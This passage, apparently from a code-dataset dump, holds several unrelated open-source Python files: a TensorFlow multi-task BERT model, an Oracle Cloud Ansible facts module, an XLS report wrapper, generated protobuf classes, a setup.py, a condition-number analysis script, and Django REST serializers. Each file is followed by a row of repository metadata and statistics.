for signature_name in layer_signature_name:
if signature_name == 'input_embeddings':
inputs_kwargs.update(
{signature_name: input_embeddings})
self.top_layer_dict[problem] = problem_type_layer[problem_type](
**inputs_kwargs)
def call(self,
inputs: Tuple[Dict[str, Dict[str, tf.Tensor]], Dict[str, Dict[str, tf.Tensor]]],
mode: str) -> Dict[str, tf.Tensor]:
features, hidden_feature = inputs
return_dict = {}
for problem_dict in self.params.run_problem_list:
for problem in problem_dict:
feature_this_round = features[problem]
hidden_feature_this_round = hidden_feature[problem]
problem_type = self.params.problem_type[problem]
# if pretrain, return pretrain logit
if problem_type == 'pretrain':
pretrain = self.top_layer_dict[problem]
return_dict[problem] = pretrain(
(feature_this_round, hidden_feature_this_round), mode)
return return_dict
if self.params.label_transfer and self.params.grid_transformer:
raise ValueError(
'Label Transfer and grid transformer cannot be enabled in the same time.'
)
with tf.name_scope(problem):
layer = self.top_layer_dict[problem]
return_dict[problem] = layer(
(feature_this_round, hidden_feature_this_round), mode)
if self.params.augument_mask_lm and mode == tf.estimator.ModeKeys.TRAIN:
raise NotImplementedError
# try:
# mask_lm_top = MaskLM(self.params)
# return_dict['augument_mask_lm'] = \
# mask_lm_top(features,
# hidden_feature, mode, 'dummy')
# except ValueError:
# pass
return return_dict
# Cell
class BertMultiTask(tf.keras.Model):
def __init__(self, params: BaseParams, name='BertMultiTask') -> None:
super(BertMultiTask, self).__init__(name=name)
self.params = params
# initialize body model, aka transformers
self.body = BertMultiTaskBody(params=self.params)
# mlm might need word embedding from bert
# build sub-model
_ = get_embedding_table_from_model(self.body.bert.bert_model)
main_model = get_transformer_main_model(self.body.bert.bert_model)
# input_embeddings = self.body.bert.bert_model.bert.embeddings
input_embeddings = main_model.embeddings
self.top = BertMultiTaskTop(
params=self.params, input_embeddings=input_embeddings)
def call(self, inputs, mode=tf.estimator.ModeKeys.TRAIN):
feature_per_problem, hidden_feature_per_problem = self.body(
inputs, mode)
pred_per_problem = self.top(
(feature_per_problem, hidden_feature_per_problem), mode)
return pred_per_problem
def compile(self):
super(BertMultiTask, self).compile()
logger = tf.get_logger()
logger.info('Initial lr: {}'.format(self.params.lr))
logger.info('Train steps: {}'.format(self.params.train_steps))
logger.info('Warmup steps: {}'.format(self.params.num_warmup_steps))
self.optimizer, self.lr_scheduler = transformers.optimization_tf.create_optimizer(
init_lr=self.params.lr,
num_train_steps=self.params.train_steps,
num_warmup_steps=self.params.num_warmup_steps,
weight_decay_rate=0.01
)
self.mean_acc = tf.keras.metrics.Mean(name='mean_acc')
def train_step(self, data):
with tf.GradientTape() as tape:
# Forward pass
_ = self(data, mode=tf.estimator.ModeKeys.TRAIN)
# gather losses from all problems
loss_dict = {'{}_loss'.format(problem_name): tf.reduce_sum(top_layer.losses) for problem_name,
top_layer in self.top.top_layer_dict.items()}
# metric_dict = {'{}_metric'.format(problem_name): tf.reduce_mean(top_layer.metrics) for problem_name,
# top_layer in self.top.top_layer_dict.items()}
metric_dict = {m.name: m.result() for m in self.metrics}
# Compute gradients
trainable_vars = self.trainable_variables
gradients = tape.gradient(self.losses, trainable_vars)
# Update weights
self.optimizer.apply_gradients(zip(gradients, trainable_vars))
self.mean_acc.update_state(
[v for n, v in metric_dict.items() if n != 'mean_acc'])
return_dict = metric_dict
return_dict.update(loss_dict)
return_dict[self.mean_acc.name] = self.mean_acc.result()
# Return a dict mapping metric names to current value.
# Note that it will include the loss (tracked in self.metrics).
return return_dict
def test_step(self, data):
"""The logic for one evaluation step.
This method can be overridden to support custom evaluation logic.
This method is called by `Model.make_test_function`.
        This function should contain the mathematical logic for one step of
evaluation.
This typically includes the forward pass, loss calculation, and metrics
updates.
Configuration details for *how* this logic is run (e.g. `tf.function` and
`tf.distribute.Strategy` settings), should be left to
`Model.make_test_function`, which can also be overridden.
Arguments:
data: A nested structure of `Tensor`s.
Returns:
A `dict` containing values that will be passed to
`tf.keras.callbacks.CallbackList.on_train_batch_end`. Typically, the
values of the `Model`'s metrics are returned.
"""
y_pred = self(data, mode=tf.estimator.ModeKeys.EVAL)
# Updates stateful loss metrics.
self.compiled_loss(
None, y_pred, None, regularization_losses=self.losses)
self.compiled_metrics.update_state(None, y_pred, None)
# get metrics to calculate mean
m_list = []
for metric in self.metrics:
if 'mean_acc' in metric.name:
continue
if 'acc' in metric.name:
m_list.append(metric.result())
if 'f1' in metric.name:
m_list.append(metric.result())
self.mean_acc.update_state(
m_list)
return {m.name: m.result() for m in self.metrics}
def predict_step(self, data):
return self(data, mode=tf.estimator.ModeKeys.PREDICT)
| 42.368564 | 114 | 0.623321 | 1,840 | 15,634 | 5.036957 | 0.176087 | 0.064523 | 0.03798 | 0.028485 | 0.445619 | 0.34959 | 0.289167 | 0.233492 | 0.181916 | 0.171019 | 0 | 0.005824 | 0.286107 | 15,634 | 368 | 115 | 42.483696 | 0.824568 | 0.216579 | 0 | 0.162162 | 1 | 0 | 0.051026 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.058559 | false | 0 | 0.036036 | 0.004505 | 0.148649 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
e6885b17b97915311f8a8bd86b9f72a31641ef6d | 7,392 | py | Python | plugins/modules/oci_database_management_object_privilege_facts.py | LaudateCorpus1/oci-ansible-collection | 2b1cd87b4d652a97c1ca752cfc4fdc4bdb37a7e7 | [
"Apache-2.0"
] | null | null | null | plugins/modules/oci_database_management_object_privilege_facts.py | LaudateCorpus1/oci-ansible-collection | 2b1cd87b4d652a97c1ca752cfc4fdc4bdb37a7e7 | [
"Apache-2.0"
] | null | null | null | plugins/modules/oci_database_management_object_privilege_facts.py | LaudateCorpus1/oci-ansible-collection | 2b1cd87b4d652a97c1ca752cfc4fdc4bdb37a7e7 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/python
# Copyright (c) 2020, 2022 Oracle and/or its affiliates.
# This software is made available to you under the terms of the GPL 3.0 license or the Apache 2.0 license.
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
# Apache License v2.0
# See LICENSE.TXT for details.
# GENERATED FILE - DO NOT EDIT - MANUAL CHANGES WILL BE OVERWRITTEN
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {
    "metadata_version": "1.1",
    "status": ["preview"],
    "supported_by": "community",
}
DOCUMENTATION = """
---
module: oci_database_management_object_privilege_facts
short_description: Fetches details about one or multiple ObjectPrivilege resources in Oracle Cloud Infrastructure
description:
    - Fetches details about one or multiple ObjectPrivilege resources in Oracle Cloud Infrastructure
    - Gets the list of Object Privileges granted for the specified user.
version_added: "2.9.0"
author: Oracle (@oracle)
options:
    managed_database_id:
        description:
            - The L(OCID,https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm) of the Managed Database.
        type: str
        required: true
    user_name:
        description:
            - The name of the user whose details are to be viewed.
        type: str
        required: true
    name:
        description:
            - A filter to return only resources that match the entire name.
        type: str
    sort_by:
        description:
            - The field to sort information by. Only one sortOrder can be used. The default sort order
              for 'NAME' is ascending. The 'NAME' sort order is case-sensitive.
        type: str
        choices:
            - "NAME"
    sort_order:
        description:
            - The option to sort information in ascending ('ASC') or descending ('DESC') order. Ascending order is the default order.
        type: str
        choices:
            - "ASC"
            - "DESC"
extends_documentation_fragment: [ oracle.oci.oracle ]
"""

EXAMPLES = """
- name: List object_privileges
  oci_database_management_object_privilege_facts:
    # required
    managed_database_id: "ocid1.manageddatabase.oc1..xxxxxxEXAMPLExxxxxx"
    user_name: user_name_example

    # optional
    name: name_example
    sort_by: NAME
    sort_order: ASC
"""
RETURN = """
object_privileges:
    description:
        - List of ObjectPrivilege resources
    returned: on success
    type: complex
    contains:
        name:
            description:
                - The name of the privilege on the object.
            returned: on success
            type: str
            sample: name_example
        schema_type:
            description:
                - The type of the object.
            returned: on success
            type: str
            sample: schema_type_example
        owner:
            description:
                - The owner of the object.
            returned: on success
            type: str
            sample: owner_example
        grantor:
            description:
                - The name of the user who performed the grant
            returned: on success
            type: str
            sample: grantor_example
        hierarchy:
            description:
                - Indicates whether the privilege was granted with the HIERARCHY OPTION (YES) or not (NO)
            returned: on success
            type: str
            sample: YES
        object:
            description:
                - The name of the object. The object can be any object, including tables, packages, indexes, sequences, and so on.
            returned: on success
            type: str
            sample: object_example
        grant_option:
            description:
                - Indicates whether the privilege was granted with the GRANT OPTION (YES) or not (NO)
            returned: on success
            type: str
            sample: YES
        common:
            description:
                - "Indicates how the grant was made. Possible values:
                  YES if the role was granted commonly (CONTAINER=ALL was used)
                  NO if the role was granted locally (CONTAINER=ALL was not used)"
            returned: on success
            type: str
            sample: YES
        inherited:
            description:
                - Indicates whether the role grant was inherited from another container (YES) or not (NO)
            returned: on success
            type: str
            sample: YES
    sample: [{
        "name": "name_example",
        "schema_type": "schema_type_example",
        "owner": "owner_example",
        "grantor": "grantor_example",
        "hierarchy": "YES",
        "object": "object_example",
        "grant_option": "YES",
        "common": "YES",
        "inherited": "YES"
    }]
"""
from ansible.module_utils.basic import AnsibleModule
from ansible_collections.oracle.oci.plugins.module_utils import oci_common_utils
from ansible_collections.oracle.oci.plugins.module_utils.oci_resource_utils import (
    OCIResourceFactsHelperBase,
    get_custom_class,
)

try:
    from oci.database_management import DbManagementClient

    HAS_OCI_PY_SDK = True
except ImportError:
    HAS_OCI_PY_SDK = False


class ObjectPrivilegeFactsHelperGen(OCIResourceFactsHelperBase):
    """Supported operations: list"""

    def get_required_params_for_list(self):
        return [
            "managed_database_id",
            "user_name",
        ]

    def list_resources(self):
        optional_list_method_params = [
            "name",
            "sort_by",
            "sort_order",
        ]
        optional_kwargs = dict(
            (param, self.module.params[param])
            for param in optional_list_method_params
            if self.module.params.get(param) is not None
        )
        return oci_common_utils.list_all_resources(
            self.client.list_object_privileges,
            managed_database_id=self.module.params.get("managed_database_id"),
            user_name=self.module.params.get("user_name"),
            **optional_kwargs
        )
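# The optional_kwargs construction in list_resources above is a generic
# pattern for forwarding only those optional parameters the caller actually
# set. Stripped of the Ansible plumbing it reduces to the following
# standalone sketch; the parameter values here are made up for illustration:
module_params = {'name': 'obj1', 'sort_by': None, 'sort_order': 'ASC'}
optional_list_method_params = ['name', 'sort_by', 'sort_order']

# drop every parameter whose value is None before forwarding
optional_kwargs = dict(
    (param, module_params[param])
    for param in optional_list_method_params
    if module_params.get(param) is not None
)
print(optional_kwargs)  # {'name': 'obj1', 'sort_order': 'ASC'}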
ObjectPrivilegeFactsHelperCustom = get_custom_class("ObjectPrivilegeFactsHelperCustom")
class ResourceFactsHelper(
ObjectPrivilegeFactsHelperCustom, ObjectPrivilegeFactsHelperGen
):
pass
def main():
module_args = oci_common_utils.get_common_arg_spec()
module_args.update(
dict(
managed_database_id=dict(type="str", required=True),
user_name=dict(type="str", required=True),
name=dict(type="str"),
sort_by=dict(type="str", choices=["NAME"]),
sort_order=dict(type="str", choices=["ASC", "DESC"]),
)
)
module = AnsibleModule(argument_spec=module_args)
if not HAS_OCI_PY_SDK:
module.fail_json(msg="oci python sdk required for this module.")
resource_facts_helper = ResourceFactsHelper(
module=module,
resource_type="object_privilege",
service_client_class=DbManagementClient,
namespace="database_management",
)
result = []
if resource_facts_helper.is_list():
result = resource_facts_helper.list()
else:
resource_facts_helper.fail()
module.exit_json(object_privileges=result)
if __name__ == "__main__":
main()
| 30.92887 | 133 | 0.626759 | 822 | 7,392 | 5.453771 | 0.284672 | 0.029668 | 0.037921 | 0.046844 | 0.274593 | 0.228418 | 0.154584 | 0.147223 | 0.116663 | 0.073388 | 0 | 0.004805 | 0.296131 | 7,392 | 238 | 134 | 31.058824 | 0.856813 | 0.05533 | 0 | 0.265 | 0 | 0.015 | 0.648114 | 0.03242 | 0 | 0 | 0 | 0 | 0 | 1 | 0.015 | false | 0.005 | 0.03 | 0.005 | 0.065 | 0.005 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
e68c436db086a9f75f4ec9a1c59f8bdd8afa7f45 | 1,028 | py | Python | src/simple_report/xls/document.py | glibin/simple-report | 1e68b2fe568d6f7a7d9332d0e83b9a21661419e0 | [
"Apache-2.0"
] | null | null | null | src/simple_report/xls/document.py | glibin/simple-report | 1e68b2fe568d6f7a7d9332d0e83b9a21661419e0 | [
"Apache-2.0"
] | null | null | null | src/simple_report/xls/document.py | glibin/simple-report | 1e68b2fe568d6f7a7d9332d0e83b9a21661419e0 | [
"Apache-2.0"
] | null | null | null | #coding: utf-8
import xlrd
from simple_report.core.document_wrap import BaseDocument, SpreadsheetDocument
from simple_report.xls.workbook import Workbook
from simple_report.xls.output_options import XSL_OUTPUT_SETTINGS
class DocumentXLS(BaseDocument, SpreadsheetDocument):
"""
Обертка для отчетов в формате XLS
"""
def __init__(self, ffile, tags=None, **kwargs):
self.file = ffile
self._workbook = Workbook(ffile, **kwargs)
@property
def workbook(self):
"""
Получение рабочей книги
:result: рабочая книга
"""
return self._workbook
def build(self, dst):
"""
Сборка отчета
:param dst: путь до выходного файла
:result:
"""
self._workbook.build(dst)
def __setattr__(self, key, value):
if key in XSL_OUTPUT_SETTINGS:
setattr(self._workbook, key, value)
else:
super(DocumentXLS, self).__setattr__(key, value)
| 25.7 | 79 | 0.614786 | 109 | 1,028 | 5.568807 | 0.53211 | 0.079077 | 0.079077 | 0.062603 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.001389 | 0.299611 | 1,028 | 39 | 80 | 26.358974 | 0.841667 | 0.150778 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.222222 | false | 0 | 0.222222 | 0 | 0.555556 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
e68c634de73f166e370b403383fc377943dc8b21 | 4,796 | py | Python | pipeline_sdk/api/build/cancel_build_pb2.py | easyopsapis/easyops-api-python | adf6e3bad33fa6266b5fa0a449dd4ac42f8447d0 | [
"Apache-2.0"
] | 5 | 2019-07-31T04:11:05.000Z | 2021-01-07T03:23:20.000Z | pipeline_sdk/api/build/cancel_build_pb2.py | easyopsapis/easyops-api-python | adf6e3bad33fa6266b5fa0a449dd4ac42f8447d0 | [
"Apache-2.0"
] | null | null | null | pipeline_sdk/api/build/cancel_build_pb2.py | easyopsapis/easyops-api-python | adf6e3bad33fa6266b5fa0a449dd4ac42f8447d0 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: cancel_build.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from google.protobuf import empty_pb2 as google_dot_protobuf_dot_empty__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='cancel_build.proto',
package='build',
syntax='proto3',
serialized_options=None,
serialized_pb=_b('\n\x12\x63\x61ncel_build.proto\x12\x05\x62uild\x1a\x1bgoogle/protobuf/empty.proto\"!\n\rCancelRequest\x12\x10\n\x08\x62uild_id\x18\x01 \x01(\t\"o\n\x15\x43\x61ncelResponseWrapper\x12\x0c\n\x04\x63ode\x18\x01 \x01(\x05\x12\x13\n\x0b\x63odeExplain\x18\x02 \x01(\t\x12\r\n\x05\x65rror\x18\x03 \x01(\t\x12$\n\x04\x64\x61ta\x18\x04 \x01(\x0b\x32\x16.google.protobuf.Emptyb\x06proto3')
,
dependencies=[google_dot_protobuf_dot_empty__pb2.DESCRIPTOR,])
_CANCELREQUEST = _descriptor.Descriptor(
name='CancelRequest',
full_name='build.CancelRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='build_id', full_name='build.CancelRequest.build_id', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=58,
serialized_end=91,
)
_CANCELRESPONSEWRAPPER = _descriptor.Descriptor(
name='CancelResponseWrapper',
full_name='build.CancelResponseWrapper',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='code', full_name='build.CancelResponseWrapper.code', index=0,
number=1, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='codeExplain', full_name='build.CancelResponseWrapper.codeExplain', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='error', full_name='build.CancelResponseWrapper.error', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='data', full_name='build.CancelResponseWrapper.data', index=3,
number=4, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=93,
serialized_end=204,
)
_CANCELRESPONSEWRAPPER.fields_by_name['data'].message_type = google_dot_protobuf_dot_empty__pb2._EMPTY
DESCRIPTOR.message_types_by_name['CancelRequest'] = _CANCELREQUEST
DESCRIPTOR.message_types_by_name['CancelResponseWrapper'] = _CANCELRESPONSEWRAPPER
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
CancelRequest = _reflection.GeneratedProtocolMessageType('CancelRequest', (_message.Message,), {
'DESCRIPTOR' : _CANCELREQUEST,
'__module__' : 'cancel_build_pb2'
# @@protoc_insertion_point(class_scope:build.CancelRequest)
})
_sym_db.RegisterMessage(CancelRequest)
CancelResponseWrapper = _reflection.GeneratedProtocolMessageType('CancelResponseWrapper', (_message.Message,), {
'DESCRIPTOR' : _CANCELRESPONSEWRAPPER,
'__module__' : 'cancel_build_pb2'
# @@protoc_insertion_point(class_scope:build.CancelResponseWrapper)
})
_sym_db.RegisterMessage(CancelResponseWrapper)
# @@protoc_insertion_point(module_scope)
| 35.791045 | 399 | 0.755004 | 591 | 4,796 | 5.832487 | 0.240271 | 0.039455 | 0.048738 | 0.034813 | 0.466783 | 0.441833 | 0.43371 | 0.411662 | 0.389614 | 0.389614 | 0 | 0.035342 | 0.120934 | 4,796 | 133 | 400 | 36.06015 | 0.782258 | 0.062969 | 0 | 0.559633 | 1 | 0.009174 | 0.191485 | 0.139545 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.055046 | 0 | 0.055046 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
e692cff5589dc59f4785c76fbfa11c53ff5a1d4e | 305 | py | Python | setup.py | arokem/afq-deep-learning | 61d7746f03914d63c56253d10d0f6a21e6c78e90 | [
"BSD-3-Clause"
] | null | null | null | setup.py | arokem/afq-deep-learning | 61d7746f03914d63c56253d10d0f6a21e6c78e90 | [
"BSD-3-Clause"
] | null | null | null | setup.py | arokem/afq-deep-learning | 61d7746f03914d63c56253d10d0f6a21e6c78e90 | [
"BSD-3-Clause"
] | 2 | 2021-12-01T17:04:39.000Z | 2022-01-20T22:53:40.000Z | from setuptools import find_packages, setup
setup(
name='src',
packages=find_packages(),
version='0.1.0',
description='This repository hosts some work-in-progress experiments applying deep learning to predict age using tractometry data.',
author='Joanna Qiao',
license='BSD-3',
)
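# find_packages() discovers directories that contain an __init__.py under the
# project root; for this repository's layout it would return ['src']. A
# standalone sketch using a throwaway directory tree (the layout is
# hypothetical, built only for illustration):
import os
import tempfile

from setuptools import find_packages

# build a minimal project tree with a single package named 'src'
root = tempfile.mkdtemp()
os.makedirs(os.path.join(root, 'src'))
open(os.path.join(root, 'src', '__init__.py'), 'w').close()

pkgs = find_packages(where=root)
print(pkgs)  # ['src']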
| 27.727273 | 136 | 0.718033 | 40 | 305 | 5.425 | 0.875 | 0.110599 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.015873 | 0.17377 | 305 | 10 | 137 | 30.5 | 0.845238 | 0 | 0 | 0 | 0 | 0 | 0.462295 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.111111 | 0 | 0.111111 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
e6957e411e3b025a67a76d0f0a74f5d86329bb6f | 2,683 | py | Python | analytical/conditionnumber.py | gyyang/olfaction_evolution | 434baa85b91f450e1ab63c6b9eafb8d370f1df96 | [
"MIT"
] | 9 | 2021-10-11T01:16:23.000Z | 2022-01-13T14:07:08.000Z | analytical/conditionnumber.py | gyyang/olfaction_evolution | 434baa85b91f450e1ab63c6b9eafb8d370f1df96 | [
"MIT"
] | 1 | 2021-10-30T09:49:08.000Z | 2021-10-30T09:49:08.000Z | analytical/conditionnumber.py | gyyang/olfaction_evolution | 434baa85b91f450e1ab63c6b9eafb8d370f1df96 | [
"MIT"
] | null | null | null | """Analyze condition number of the network."""
import numpy as np
import matplotlib.pyplot as plt
# import model
def _get_sparse_mask(nx, ny, non, complex=False, nOR=50):
"""Generate a binary mask.
The mask will be of size (nx, ny)
For all the nx connections to each 1 of the ny units, only non connections are 1.
Args:
nx: int
ny: int
non: int, must not be larger than nx
Return:
mask: numpy array (nx, ny)
"""
mask = np.zeros((nx, ny))
if not complex:
mask[:non] = 1
for i in range(ny):
np.random.shuffle(mask[:, i]) # shuffling in-place
return mask.astype(np.float32)
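# The docstring's claim, that each of the ny columns ends up with exactly
# `non` ones, can be checked with a standalone re-implementation of the
# non-complex branch (numpy assumed available; not part of the original file):
import numpy as np

def sparse_mask(nx, ny, non):
    mask = np.zeros((nx, ny))
    mask[:non] = 1
    for i in range(ny):
        np.random.shuffle(mask[:, i])  # shuffles the column in place
    return mask.astype(np.float32)

m = sparse_mask(50, 100, 7)
# shuffling only permutes within a column, so every column sums to `non`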
def _get_cond(q, n_orn, n_pn, n_kc, n_kc_claw):
    M = np.random.rand(n_orn, n_pn)
    M_new = M * (1-q) + np.eye(n_orn) * q

    # J = np.random.rand(N_PN, N_KC) / np.sqrt(N_PN + N_KC)
    # J = np.random.randn(N_PN, N_KC) / np.sqrt(N_PN + N_KC)
    J = np.random.rand(n_pn, n_kc)
    mask = _get_sparse_mask(n_pn, n_kc, n_kc_claw) / n_kc_claw
    J = J * mask

    K = np.dot(M_new, J)
    # cond = np.linalg.cond(K)
    cond = np.linalg.norm(np.linalg.pinv(K)) * np.linalg.norm(K)
    return cond
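# _get_cond uses the product of the Frobenius norms of K and its
# pseudo-inverse rather than np.linalg.cond (note the commented-out line).
# A small sanity check of that choice, standalone and not from the original
# module: for K = c * I of size n, ||K||_F = c*sqrt(n) and
# ||pinv(K)||_F = sqrt(n)/c, so the product is n regardless of c, while the
# 2-norm condition number np.linalg.cond(K) is 1.
import numpy as np

n, c = 4, 2.5
K = c * np.eye(n)
cond = np.linalg.norm(np.linalg.pinv(K)) * np.linalg.norm(K)
print(cond)  # 4.0 (up to floating point)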
def get_logcond(q=1, n_orn=50, n_pn=50, n_kc=2500, n_kc_claw=7, n_rep=10):
    conds = [_get_cond(q, n_orn, n_pn, n_kc, n_kc_claw) for i in range(n_rep)]
    return np.mean(np.log10(conds))


def plot_cond_by_q(n_kc=2500):
    qs = np.linspace(0, 1, 100)
    conds = [get_logcond(q=q, n_kc=n_kc) for q in qs]

    plt.figure()
    plt.plot(qs, conds, 'o-')
    plt.title('N_KC: ' + str(n_kc))
    plt.xlabel('fraction diagonal')
    plt.ylabel('log condition number')
    # plt.savefig('figures/condvsfracdiag_nkc'+str(n_kc)+'.pdf', transparent=True)


def plot_cond_by_n_kc():
    n_kcs = np.logspace(1, 4, 10).astype(int)
    conds_q1 = np.array([get_logcond(n_kc=n_kc, q=1) for n_kc in n_kcs])

    plt.figure()
    plt.plot(np.log10(n_kcs), conds_q1, 'o-')
    plt.xticks(np.log10(n_kcs), n_kcs)
    plt.xlabel('N_KC')

    n_kcs = np.logspace(1, 4, 10).astype(int)
    conds_q0 = np.array([get_logcond(n_kc=n_kc, q=0) for n_kc in n_kcs])

    plt.figure()
    plt.plot(np.log10(n_kcs), conds_q0, 'o-')
    plt.xticks(np.log10(n_kcs), n_kcs)
    plt.xlabel('N_KC')

    plt.figure()
    plt.plot(np.log10(n_kcs), conds_q1 - conds_q0, 'o-')
    plt.xticks(np.log10(n_kcs), n_kcs)
    plt.ylabel('Log decrease in condition number')
    plt.xlabel('N_KC')


n_kc_claws = np.arange(1, 50)
conds = np.array([get_logcond(n_kc_claw=n) for n in n_kc_claws])

plt.figure()
plt.plot(n_kc_claws, conds, 'o-')
plt.xticks(n_kc_claws)
plt.xlabel('N_KC_claw')
plt.show()
| 27.10101 | 85 | 0.621319 | 502 | 2,683 | 3.10757 | 0.23506 | 0.069231 | 0.023077 | 0.030769 | 0.335256 | 0.326923 | 0.314103 | 0.305769 | 0.291026 | 0.260256 | 0 | 0.029808 | 0.224748 | 2,683 | 98 | 86 | 27.377551 | 0.720192 | 0.200149 | 0 | 0.240741 | 1 | 0 | 0.050645 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.092593 | false | 0 | 0.037037 | 0 | 0.185185 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
e6960adb05d4b964e50fe6cceef1e01091d1811d | 2,327 | py | Python | FusionIIIT/applications/placement_cell/api/serializers.py | 29rj/Fusion | bc2941a67532e183adeb0bc4042df0b182b9e3aa | [
"bzip2-1.0.6"
] | 29 | 2019-02-20T15:35:33.000Z | 2022-03-22T11:10:57.000Z | FusionIIIT/applications/placement_cell/api/serializers.py | 29rj/Fusion | bc2941a67532e183adeb0bc4042df0b182b9e3aa | [
"bzip2-1.0.6"
] | 409 | 2019-01-17T19:30:51.000Z | 2022-03-31T16:28:45.000Z | FusionIIIT/applications/placement_cell/api/serializers.py | 29rj/Fusion | bc2941a67532e183adeb0bc4042df0b182b9e3aa | [
"bzip2-1.0.6"
] | 456 | 2019-01-12T11:01:13.000Z | 2022-03-30T17:06:52.000Z | from rest_framework.authtoken.models import Token
from rest_framework import serializers
from applications.placement_cell.models import (Achievement, Course, Education,
                                                Experience, Has, Patent,
                                                Project, Publication, Skill,
                                                PlacementStatus, NotifyStudent)


class SkillSerializer(serializers.ModelSerializer):
    class Meta:
        model = Skill
        fields = ('__all__')


class HasSerializer(serializers.ModelSerializer):
    skill_id = SkillSerializer()

    class Meta:
        model = Has
        fields = ('skill_id', 'skill_rating')

    def create(self, validated_data):
        skill = validated_data.pop('skill_id')
        skill_id, created = Skill.objects.get_or_create(**skill)
        try:
            has_obj = Has.objects.create(skill_id=skill_id, **validated_data)
        except:
            raise serializers.ValidationError({'skill': 'This skill is already present'})
        return has_obj


class EducationSerializer(serializers.ModelSerializer):
    class Meta:
        model = Education
        fields = ('__all__')


class CourseSerializer(serializers.ModelSerializer):
    class Meta:
        model = Course
        fields = ('__all__')


class ExperienceSerializer(serializers.ModelSerializer):
    class Meta:
        model = Experience
        fields = ('__all__')


class ProjectSerializer(serializers.ModelSerializer):
    class Meta:
        model = Project
        fields = ('__all__')


class AchievementSerializer(serializers.ModelSerializer):
    class Meta:
        model = Achievement
        fields = ('__all__')


class PublicationSerializer(serializers.ModelSerializer):
    class Meta:
        model = Publication
        fields = ('__all__')


class PatentSerializer(serializers.ModelSerializer):
    class Meta:
        model = Patent
        fields = ('__all__')


class NotifyStudentSerializer(serializers.ModelSerializer):
